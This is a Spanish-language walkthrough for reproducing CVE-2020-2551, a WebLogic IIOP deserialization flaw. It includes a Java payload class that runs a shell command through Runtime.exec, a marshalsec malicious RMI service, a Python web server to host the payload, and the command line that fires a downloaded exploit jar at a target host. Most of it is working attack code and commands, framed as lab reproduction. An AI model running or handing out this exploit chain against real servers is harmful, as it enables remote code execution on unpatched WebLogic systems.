
Weblogic IIOP CVE-2020-2551
Deserialización de Weblogic IIOP
Weblogic10.3.6+jdk1.6
Paquete jar empaquetado Código de extracción: a6ob
Descargue el paquete jar, luego use marshalsec para iniciar un servicio RMI malicioso, y compile localmente un exp.java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Compile, en la medida de lo posible, con la misma versión de jdk y la misma biblioteca de dependencias (wlfullclient.jar) que weblogic y luego inicie un servidor web local
python -m http.server --bind 0.0.0.0 80
Ejecute el paquete jar desde la línea de comandos
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
El efecto real se muestra en la imagen

Muchas personas dicen que no logran reproducirlo. Después de leer algunos artículos en línea, descubrí que IIOP tiene problemas con el modo NAT. Hoy encontré que en Xianzhi ya existe https://xz.aliyun.com/t/7498, pueden ir allí ustedes mismos.